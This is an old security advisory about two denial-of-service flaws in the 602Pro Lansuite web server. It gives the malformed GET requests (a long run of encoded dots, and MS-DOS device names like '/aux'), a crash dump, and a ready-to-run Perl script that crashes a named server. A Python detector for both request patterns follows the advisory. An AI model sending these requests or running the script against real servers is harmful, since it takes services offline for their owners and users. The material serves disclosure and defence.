
From: nitr0s_(at)_HOTMAIL.COM <nitr0s_(at)_HOTMAIL.COM>
Date: 27.03.2001
Subject: 602Pro Lansuite Denial Of Service 1.0.34

Advisory Name: Lansuite Webserver Denial of Service
Discovered: 8th and 23rd of March 2001
Application: 602Pro Lansuite 2000a 1.0.34 - prior versions and possibly 1.0.35
Platform: Windows 2k, 95/98/NT - others unknown
Severity: Denial of service from application
Credit: Liamer@eircom.net
Vendor Status: Unknown - http://www.602software.com/

Description:

There are 2 problems: the first is a buffer overflow in
WEBPROX.DLL and the other relates to MS-DOS
device files. Credit should be given to Gründl
<peter.grundl@defcom.com>, who made me think of
trying this same problem that he found in Alt-N
Technologies MDaemon WebConfiguration feature,
which also affects Xitami Webserver 2.4b5 and
probably a whole load of other Windows server
programs.

Demonstration:

Connect to the webserver and send the following
request:

GET /%2e%2e%2e%2e.... /HTTP/1.0

where %2e is repeated more than 157 times.

Depending on how many times %2e or [.] is sent, the
server will exit, displaying the following error:

LANSUITE caused an invalid page fault in
module WEBPROX.DLL at 015f:008a1326.
Registers:
EAX=0000000a CS=015f EIP=008a1326
EFLGS=00010216
EBX=00000008 SS=0167 ESP=05202848
EBP=05202848
ECX=0000000a DS=0167 ESI=81648e38 FS=2c37
EDX=334f2b1f ES=0167 EDI=81623ff0 GS=0000
Bytes at CS:EIP:
8b 48 2c 83 e1 01 85 c9 74 2d 8b 55 08 c7 42 18
Stack dump:
052029dc 00862e9a 0000000a 334f2b1f 000000fa
81623ff0 81648e38 00000008 bff7b317 018d0000
00000000 018d1650 018d1650 0520ace7 018d164c
052028cc


The other problem is triggered by requesting MS-DOS
device files. Send the following request to the
webserver on port 80:

GET /aux

---------------------------------------------------------------
#!/usr/bin/perl
#
# 602Pro Lansuite 2000a 1.0.34 Denial Of Service
#
#
# Malformed GET request
#
use Getopt::Std;
use Socket;

getopts('s:', \%args);
if(!defined($args{s})){&usage;}

my ($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);

$foo = "%2e";                         
$number = "160";                      
$data .= $foo x $number;
$serv = $args{s};       
$port =  80;            
$buf = "GET /$data /HTTP/1.0\r\n\r\n";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die ("Error: $!");
connect(S, $paddr) || die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";

print("Data has been successfully sent to $serv\n");

sub usage {die("\n\n$0 -s <server>\n\n");}
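
A defensive check for the two request patterns this advisory describes, written as an added example (not part of the original advisory or the vendor's code): it decodes the request path and flags long runs of dots and reserved MS-DOS device names. The function name, the threshold of 8 dots and the sample request lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Reserved MS-DOS device names that Windows resolves in any directory.
DOS_DEVICES = {"CON", "PRN", "AUX", "NUL",
               *(f"COM{i}" for i in range(1, 10)),
               *(f"LPT{i}" for i in range(1, 10))}
# Assumed alert threshold; the advisory's crash needed more than 157 dots.
MAX_DOT_RUN = 8


def inspect_request_line(request_line):
    """Return a list of findings for one HTTP request line."""
    parts = request_line.split()
    if len(parts) < 2:
        return ["malformed request line"]
    path = parts[1].split("?", 1)[0]
    # Decode repeatedly so double-encoded dots (%252e) are also seen.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    findings = []
    longest = max((len(m) for m in re.findall(r"\.+", path)), default=0)
    if longest > MAX_DOT_RUN:
        findings.append(f"dot run of {longest}")
    for segment in re.split(r"[\\/]", path):
        # "aux", "AUX.txt" and "aux:" all name the device on Windows.
        stem = segment.split(".", 1)[0].rstrip(" :").upper()
        if stem in DOS_DEVICES:
            findings.append(f"DOS device name {stem}")
    return findings


# Constructed sample request lines (not taken from real logs).
SAMPLES = [
    "GET /index.html HTTP/1.0",
    "GET /" + "%2e" * 160 + " /HTTP/1.0",
    "GET /aux",
    "GET /docs/Com1.txt HTTP/1.0",
    "GET /images/../auxiliary.png HTTP/1.0",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(line[:40], "->", inspect_request_line(line) or "ok")
```

The same function can sit in a reverse proxy in front of a Windows web server or be run over access logs after the fact.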
